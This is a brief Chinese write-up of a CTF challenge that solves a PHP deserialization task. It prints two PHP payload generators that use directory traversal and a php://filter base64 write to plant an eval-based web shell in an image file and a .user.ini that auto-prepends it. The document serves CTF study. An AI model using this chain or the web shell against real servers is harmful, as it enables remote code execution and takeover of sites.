buu红包题writeup

非常感谢赵师傅出的题(赵总nb),这里记录一下解题思路

题目给了源码,很熟悉的代码,和之前高校运维赛的ezpop对比一下

image-20200129101413584

发现多了一步使文件名随机,并且比较了后缀并限制了后缀不能为php

高校运维赛的wp:https://250.ac.cn/2019/11/21/2019-EIS-WriteUp/#ezpop

一开始的想法是后缀绕过,然后去爆破文件名,但是经过尝试,失败

经过尝试可以跨目录,这样就可以不去爆破文件名,用.user.ini去自动加载一个jpg,然后包含shell

https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html

解题过程如下

首先传一个包含shell的图片

1
2
3
4
5
6
7
8
9
10
11
12
$b = new B();
$b->writeTimes = 0;
$b -> options = array('serialize' => "base64_decode",
'data_compress' => false,
'prefix' => "php://filter/write=convert.base64-decode/resource=uploads/moyu");

$a = new A($store = $b, $key = "/../../aaaaaa.jpg", $expire = 0);
$a->autosave = false;
$a->cache = array();
$a->complete = base64_encode('qaq'.base64_encode('<?php @eval($_POST["moyu"]);?>'));

echo urlencode(serialize($a));

然后上传.user.ini

1
2
3
4
5
6
7
8
9
10
11
12
$b = new B();
$b->writeTimes = 0;
$b -> options = array('serialize' => "base64_decode",
'data_compress' => false,
'prefix' => "php://filter/write=convert.base64-decode/resource=uploads/moyu");

$a = new A($store = $b, $key = "/../../.user.ini", $expire = 0);
$a->autosave = false;
$a->cache = array();
$a->complete = base64_encode('qaq'.base64_encode("\nauto_prepend_file=aaaaaa.jpg"));

echo urlencode(serialize($a));

可以看到已经成功getshell

image-20200129104202721

剩下的就是读flag了

0%